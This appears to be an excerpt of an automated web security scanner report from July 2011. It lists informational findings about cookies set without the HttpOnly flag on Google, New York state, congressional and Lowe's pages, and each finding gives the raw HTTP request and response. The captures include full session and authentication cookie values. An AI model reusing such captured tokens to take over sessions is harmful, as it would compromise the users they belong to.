<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" id="facebook"><head><title>Error</title
...[SNIP]...

7.44. http://www.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:33 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=19674e168110c698:U=17ea5243225a615b:FF=0:TM=1308589662:LM=1310521893:S=z4pmIJAj-KHt9ejB; expires=Fri, 12-Jul-2013 01:51:33 GMT; path=/; domain=.google.com
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="Search the world&#39;s information, including webpages, images, videos a
...[SNIP]...

7.45. http://www.google.com/reviews/scripts/annotations_bootstrap.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /reviews/scripts/annotations_bootstrap.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reviews/scripts/annotations_bootstrap.js HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: max-age=0, must-revalidate
Set-Cookie: PREF=ID=19674e168110c698:U=17ea5243225a615b:TM=1308589662:LM=1310521893:S=5yFQy_JU0BcdCdTy; expires=Fri, 12-Jul-2013 01:51:33 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Date: Wed, 13 Jul 2011 01:51:33 GMT
Server: zfe
X-XSS-Protection: 1; mode=block
Connection: close


(function(){
window['google'] = window['google'] || {};
window['google']['annotations'] = window['google']['annotations'] || {};
if (!window['google']['annotations']['loaded']) {
window['google']['an
...[SNIP]...

7.46. http://www.governor.ny.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.governor.ny.gov
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.governor.ny.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:34 GMT
Server: Apache
Last-Modified: Wed, 13 Jul 2011 01:06:21 GMT
ETag: "23d91b5-8921-4a7e906413d40"
Accept-Ranges: bytes
Content-Length: 35105
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: webpool=webpool_web01; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr">

<head>
<me
...[SNIP]...

7.47. http://www.iloveny.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iloveny.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.iloveny.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 78528
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
Set-Cookie: ASP.NET_SessionId=hlgm1aj0dc4o1s55anwpet45; path=/; HttpOnly
Set-Cookie: .ILNY_AUTH=uu2GJeV09wyGQ6aKghViELP9N9Dm8hBnLsRRZ2GAG/fsaDejtDcfVW2M/fqVMdr2uAyxABndZtAy4ZnoZfLalSWT1/zyZMiJhGMHBviCGrddJMhVv5SnPrdb61MOKmiL4PjIZbT58V9/+gxlYTPHZ7yjq2xkG54L2nIaLPAHpsjdo469gG514Xi7B7i0wEB8GfR2Fz+P7VN9wLZ8dVkqiglp3tyNiQP96vRWZb/Qo1uSbo2Y9j8/7pdWILKC3zWhgf0oNcVbu71K1ZxM8kp/d16xMFGCq4Zbo1v6p0+eH2gKPvycUOCiM+MhD0EtymLNkSNnJcNHePxLugEelU5Dd0B4T+YRO6Ae9Yft8Dh919ZDp/VLj47hojdjxMpUGh97FPVtcr2J6z+5OGkuMFY8xBn0dhc/j+1T9Jj7faoCA3xi/xApnGc4r51R7EQro889/TpWey+c0aB0fXwvpuFsR7mXIoJ30owZ0yVV39DPO+KW26DuRndG1Td9i9o9LlIRnAKVCRGAKBn/l9lP37McD9zxnwWjwDYCvGl2pMn8tYz17c7yZ+ZWT3+sTJAG9JCy/5fZT9+zHA/KvqWBbVOIddlQ1mLRKaNpN32L2j0uUhFO4HJj72uJONlQ1mLRKaNpa35ox231RPbJMqqETDfFxtjTF9BaLMFWyEKfT5D5F2X3GARRWbeuBg==; expires=Wed, 13-Jul-2011 03:21:37 GMT; path=/
Date: Wed, 13 Jul 2011 01:51:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us">

<head id="He
...[SNIP]...

7.48. http://www.louise.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.louise.house.gov
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.louise.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:50:57 GMT
Server: Apache
Set-Cookie: ce12a43d31101321362cf131b5cb4bf5=2m8kqb9hvsqs9ciisr3ds8m881; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 13 Jul 2011 01:50:58 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 65651
Connection: close
Content-Type: text/html; charset=utf-8


<!doctype html>

<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" clas
...[SNIP]...

7.49. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/css/main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/css/main.css HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 05 Jul 2011 17:15:57 GMT
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 238055
Expires: Wed, 13 Jul 2011 02:03:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

/* Reset CSS */
body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td,button{margin:0;padding:0}table{border-collapse:collapse;border-spacing:0}fieldset,img
...[SNIP]...

7.50. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 24 Jun 2011 11:20:33 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 60109
Expires: Wed, 13 Jul 2011 02:03:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

/*
* common.js
* Common javascript to be run on every page of the Lowes.com web site.
*
* Copyright Lowes, Inc.
*
* Last Modified On 03/04/2010
* Modified By R. Adams
*/

var lowes=
...[SNIP]...

7.51. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 24 Jul 2009 13:05:12 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 154101
Expires: Wed, 13 Jul 2011 02:03:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

/*
   This is a compiled version of Dojo, built for deployment and not for
   development. To get an editable version, please visit:

       http://dojotoolkit.org

   for documentation and information on
...[SNIP]...

7.52. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 15 Oct 2010 17:00:00 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 72756
Expires: Wed, 13 Jul 2011 02:03:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

/*
   This is a compiled version of Dojo, built for deployment and not for
   development. To get an editable version, please visit:

       http://dojotoolkit.org

   for documentation and information on
...[SNIP]...

7.53. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 11 Nov 2010 21:24:51 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 11
Expires: Wed, 13 Jul 2011 02:03:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

/* empty */

7.54. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
